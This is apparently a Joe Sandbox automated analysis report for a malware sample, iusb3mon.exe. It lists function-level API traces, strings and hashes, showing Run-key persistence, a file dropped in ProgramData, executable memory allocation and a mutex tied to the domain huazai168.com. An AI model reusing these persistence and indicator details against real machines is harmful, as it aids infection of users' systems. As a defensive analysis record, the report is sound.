Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Find$Show$MessageSendSleep
String ID: ---------==============$===========-----------
API String ID: 155205692-1512992862
Opcode ID: 4cce314ca2f94c7114e168d09082dda0f390feaf5fad0eba4ac1019323a3702b
Instruction ID: a6ff6c034394c5606dc1fb46685a7e984c2f755b3527de8cce3e1e9de0777a4a
Opcode Fuzzy Hash: 4cce314ca2f94c7114e168d09082dda0f390feaf5fad0eba4ac1019323a3702b
Instruction Fuzzy Hash: 2DF0DAE0A8036C7AEE2037B64CCDD3F5E9DDED46997061C15B106E314188BCEC088DB0

Function 04D7571E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46
synchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,huazai168.com,04D9CC34,04D76CAB), ref: 04D75729
GetLastError.KERNEL32 ref: 04D75731
CloseHandle.KERNEL32(00000000), ref: 04D7573F
Sleep.KERNEL32(000003E8), ref: 04D75761
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04D7577F
CloseHandle.KERNEL32(00000000), ref: 04D75786

Strings

huazai168.com, xrefs: 04D7571F
LJPXYXC, xrefs: 04D75722

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
String ID: LJPXYXC$huazai168.com
API String ID: 3934243189-679209616
Opcode ID: ff73f2fd5679496b90f4984e33bf90917dbd378d9ef3653adb7ce7ba0778d538
Instruction ID: d23803440b854d9667e5349d0bee1df426e33cb5bc5afb348526d16338543f8d
Opcode Fuzzy Hash: ff73f2fd5679496b90f4984e33bf90917dbd378d9ef3653adb7ce7ba0778d538
Instruction Fuzzy Hash: 91F01D32A03130BBD2612B666C2DDDB3E5DDF576F6B110614F50DD1280EA185901C9F6

Function 04D76780 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 26
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 04D7678E
SetThreadExecutionState.KERNEL32(80000003), ref: 04D76791
SetThreadExecutionState.KERNEL32(80000001), ref: 04D7679C
Sleep.KERNEL32(000003E8), ref: 04D767AE
OutputDebugStringA.KERNEL32(Thread running...), ref: 04D767B9
OutputDebugStringA.KERNEL32(Thread Exit...), ref: 04D767C3

Strings

Thread Exit..., xrefs: 04D767BE
Thread running..., xrefs: 04D767B4

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecutionStateThread$DebugOutputString$Sleep
String ID: Thread Exit...$Thread running...
API String ID: 3332416543-10974087
Opcode ID: 44e2a6e5061960fe2afe9ecb6178fbd1fb673725e53ef320fac2413a8a7c849a
Instruction ID: 42dccd52a1da708f021bc8b3a04f70335c14c1d7fdf06b19e6e1b9613729e3ed
Opcode Fuzzy Hash: 44e2a6e5061960fe2afe9ecb6178fbd1fb673725e53ef320fac2413a8a7c849a
Instruction Fuzzy Hash: 88E08632A642266BE71167A56C40F7A6AD9EB95A70B15002BF908E3204A6646C014EF1

Function 04D75DA7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 04D75DE5
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 04D75DF0
FindWindowA.USER32(?,00000000), ref: 04D75DB1

Part of subcall function 04D77B7D: __EH_prolog.LIBCMT ref: 04D77B82

Part of subcall function 04D77109: __EH_prolog.LIBCMT ref: 04D7710E

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D75DA8

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prologMessage$FindPostSendWindow
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1670880786-3106534563
Opcode ID: 2ad6cae48c0809b27b19e08cdbeeff72c4c011d53415ff6b4f8de4e34dcb94da
Instruction ID: f78b8ec620aeeceb7105da445c562e113a393bf1dcc12371cba7c05ed8f9e0fd
Opcode Fuzzy Hash: 2ad6cae48c0809b27b19e08cdbeeff72c4c011d53415ff6b4f8de4e34dcb94da
Instruction Fuzzy Hash: 1FF0B4B23402193FFA1936A47CA9F3E129DDBC1FAAF10042EF511E61C0EE943C155AB6

Function 04D71F38 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,00000000,?,04DA8518,04D760C5,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 04D71F56
RegQueryValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,?,04DA8518,04D760C5,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 04D71F72
RegCloseKey.ADVAPI32(?,?,04DA8518,04D760C5,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 04D71F7D

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D71F64

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 3677997916-3106534563
Opcode ID: 40b49decb6123b648cf19cd30366762b0d70035c05cfc8496ea29df1b6516f6d
Instruction ID: ef57efb5c3e0d42d5d8c0c761423ad948ec46fb1c22f24ccaa4ea5f993f519b2
Opcode Fuzzy Hash: 40b49decb6123b648cf19cd30366762b0d70035c05cfc8496ea29df1b6516f6d
Instruction Fuzzy Hash: 9FF03073600218BFDF116E90DC84DFEBB6DFB05358F048926FD1596210E3369D04AB60

Function 04D78D1A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04D78D33

Part of subcall function 04D7B39D: CreateThread.KERNEL32(?,04D78D56,04D7B408,00000000,00000000,?), ref: 04D7B3DE
Part of subcall function 04D7B39D: GetLastError.KERNEL32(?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D7B3E8

WaitForSingleObject.KERNEL32(?,000000FF), ref: 04D78D60
CloseHandle.KERNEL32(?), ref: 04D78D69

Strings

G&, xrefs: 04D78D51

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: G&
API String ID: 3117531959-2298792099
Opcode ID: c6d00461c522234045f291862357b542f048342d276937d8f74faab52550489b
Instruction ID: 43420a7620e182399b862dd40bf467d1ce926890ac470c80c48bda2687972a72
Opcode Fuzzy Hash: c6d00461c522234045f291862357b542f048342d276937d8f74faab52550489b
Instruction Fuzzy Hash: 04F0BDB2901119BFDF01AFA4DD05CBE7BB9FB04210B104569FD11E2250E7359E209F90

Function 04D77AC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,04DA8518,04D76098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 04D77ADA
WriteFile.KERNEL32(00000000,04D98760,00000EE2,?,00000000), ref: 04D77AF2
CloseHandle.KERNEL32(00000000), ref: 04D77AFF

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D77ACA

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1065093856-3106534563
Opcode ID: 771dc29f208acea483f5635f1ea1bb1556cbb3ca85b0a4e06c08abe4a5394cee
Instruction ID: 2d7665186a3c61b56441ceb302682ee4517283cc12ad759cb622eaa7e181d765
Opcode Fuzzy Hash: 771dc29f208acea483f5635f1ea1bb1556cbb3ca85b0a4e06c08abe4a5394cee
Instruction Fuzzy Hash: 73E048B525122C7FFB101D61ECC5FF77B5DEB057D4F004125F605E5250D6956D404AB4

Function 04D8CD41 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,?,?,04D8CD3C), ref: 04D8CDB8
GetProcessVersion.KERNEL32(00000000,?,?,?,04D8CD3C), ref: 04D8CDF5
LoadCursorA.USER32(00000000,00007F02), ref: 04D8CE23
LoadCursorA.USER32(00000000,00007F00), ref: 04D8CE2E

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 1bef564c3f43574dde581dfed40354ef8d6cc47c1ee3f598a8ca1312d3077457
Instruction ID: 4dfd3bc9202c28862986c27624a837c2e3fbebe8efd41786f0f32697c119aa63
Opcode Fuzzy Hash: 1bef564c3f43574dde581dfed40354ef8d6cc47c1ee3f598a8ca1312d3077457
Instruction Fuzzy Hash: CE110AB1A50B509FD728EF3A989462ABBE5FB487057514D3EE18BC6B80DB78F4408F50

Function 00575B68 Relevance: 6.1, APIs: 4, Instructions: 53
timethreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0057121E

Part of subcall function 00576F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,005711FC,?,?,?,?,005711FC,?,0059A814), ref: 00576F94

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00576571
GetCurrentThreadId.KERNEL32 ref: 00576580
GetCurrentProcessId.KERNEL32 ref: 00576589
QueryPerformanceCounter.KERNEL32(?), ref: 00576596

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: CurrentTime$CounterExceptionFilePerformanceProcessQueryRaiseSystemThread___std_exception_copy
String ID:
API String ID: 3658488982-0
Opcode ID: c22066286921aafdebd79aaba1d53c8dd94b111d4d70f56c6770585d575f9c37
Instruction ID: 0bf4025217ae0ff35a91896b15d3db185b9a17b1be305d17ebacd3ff6c815758
Opcode Fuzzy Hash: c22066286921aafdebd79aaba1d53c8dd94b111d4d70f56c6770585d575f9c37
Instruction Fuzzy Hash: 60111230C0020DEBCF00EBB4E84DA9DBBB8BF14311F508955E919B6090E7709749EB51

Function 04D7B408 Relevance: 4.6, APIs: 3, Instructions: 57threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 04D7B434
TlsSetValue.KERNEL32(?), ref: 04D7B462
GetCurrentThreadId.KERNEL32 ref: 04D7B474

Part of subcall function 04D7CE08: TlsGetValue.KERNEL32(00000031,?,04D7B69E,00000000,04D7B6E5,?,?,?), ref: 04D7CE20
Part of subcall function 04D7CE08: TlsSetValue.KERNEL32(00000000,?,04D7B69E,00000000,04D7B6E5,?,?,?), ref: 04D7CEA0

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Value$CurrentThread
String ID:
API String ID: 1393879374-0
Opcode ID: e9b85f54c2c992b9cf500802a9611be3baa292bbacaca549b43cd0b796a52ebe
Instruction ID: f59556534ef5194a71ca8fd6b0e58b4844714d034752c9525425721ce82257a2
Opcode Fuzzy Hash: e9b85f54c2c992b9cf500802a9611be3baa292bbacaca549b43cd0b796a52ebe
Instruction Fuzzy Hash: 2D116D32650711EFC7209FA9D845B6ABBB8FB44768F104A2AE651D3390EB39BC40CB50

Function 04D77B7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D77B82

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D77B8B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 3519838083-3106534563
Opcode ID: 6e95c34078a481fa012e59066799b8d2da26562ff05a4ba1f95396996096679e
Instruction ID: aea5af05c8978786bfce49d2eefa6c428779984373339de717e5f564526e1d00
Opcode Fuzzy Hash: 6e95c34078a481fa012e59066799b8d2da26562ff05a4ba1f95396996096679e
Instruction Fuzzy Hash: 1F411970A002058FDB14CF58C584AADBBF1FF48328F2489A9E5559B3A1E731FE40CB91

Function 04D301CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04D3022B

Memory Dump Source

Source File: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d30000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 50063fe5e447823ed446c44b601fb07b86f69369b6358087e59bdf847ee4a173
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 05A16975A00606EFCB15CFA9C880AAEB7B1FF48706F148069E455DB355E730FA50CB90

Function 04D7B39D Relevance: 3.0, APIs: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

Part of subcall function 04D8005D: HeapAlloc.KERNEL32(00000008,04D78D56,00000000,00000000,00000000,00000000,00000000,?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D80153

CreateThread.KERNEL32(?,04D78D56,04D7B408,00000000,00000000,?), ref: 04D7B3DE
GetLastError.KERNEL32(?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D7B3E8

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID:
API String ID: 3580101977-0
Opcode ID: bc331e752334e9b52188b528e08176fd0c7f2dcbcec1569376dcc370c368cf89
Instruction ID: 193161192716f6da046e75ce6c805ded1a5eac7f5c3e5ef3fd130f5bec7bfba6
Opcode Fuzzy Hash: bc331e752334e9b52188b528e08176fd0c7f2dcbcec1569376dcc370c368cf89
Instruction Fuzzy Hash: CFF0F4362002166FDB20AE65DC04E6B3FA5EF4177DB00811EFA18C6180EB35B8019BA0

Function 04D7ED44 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,04D7B5EB,00000001), ref: 04D7ED55

Part of subcall function 04D7EBFC: GetVersionExA.KERNEL32 ref: 04D7EC1B

HeapDestroy.KERNEL32 ref: 04D7ED94

Part of subcall function 04D7EE49: HeapAlloc.KERNEL32(00000000,00000140,04D7ED7D,000003F8), ref: 04D7EE56

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: ddd2a48abc7cd669f863450b1c0e42b298e1466dd5bd90416da42cfb6df00fee
Instruction ID: be24446a0456463e88a6a8f36c517ab2488af04b07752ed83f69ee2d5c40be02
Opcode Fuzzy Hash: ddd2a48abc7cd669f863450b1c0e42b298e1466dd5bd90416da42cfb6df00fee
Instruction Fuzzy Hash: AFF09270B603019EEB706B30AC6873D3BD4FF40745F1488B9F802C8194FB64A580AA11

Function 04D7A1C0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,04D769AD,c:\inst.ini,00000000), ref: 04D7A1C4
GetLastError.KERNEL32 ref: 04D7A1CF

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: deec09c44d3f2d3b046daea4786fabef832a547903b0ccd389be7830f8f28042
Instruction ID: b77d3d2cb62e8df2c94a8c8ff4e0f59549df925f30870a0557ace4e094596961
Opcode Fuzzy Hash: deec09c44d3f2d3b046daea4786fabef832a547903b0ccd389be7830f8f28042
Instruction Fuzzy Hash: 85E086306042005AE7162F74DD0931E3B91EF42769F544648E4B5C52E0FB399840DA21

Function 04D7ACDB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,04D78D56,00000000,00000000,00000000), ref: 04D7ADC2

Part of subcall function 04D7CFF4: InitializeCriticalSection.KERNEL32(00000000,00000000,04D78D56,?,04D80113,00000009,00000000,00000000,00000000,00000000,00000000,?,04D78D56,?,?,04D78CE2), ref: 04D7D031
Part of subcall function 04D7CFF4: EnterCriticalSection.KERNEL32(04D78D56,04D78D56,?,04D80113,00000009,00000000,00000000,00000000,00000000,00000000,?,04D78D56,?,?,04D78CE2,?), ref: 04D7D04C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 9373954284d0dd48e94c8d820686031aa1250ca675679e9b0a1e7351543e6248
Instruction ID: 7e816259943b7185a9a796a63c390f8bca34a8dd8087ba88701b232d5c3f7286
Opcode Fuzzy Hash: 9373954284d0dd48e94c8d820686031aa1250ca675679e9b0a1e7351543e6248
Instruction Fuzzy Hash: 43217132B40215AFDB10EF69D841B9DB7A4FB01766F14861AF811EB3C0F7B4B9419AA4

Function 00580109 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,005723D4,00000000), ref: 0058013B

Memory Dump Source

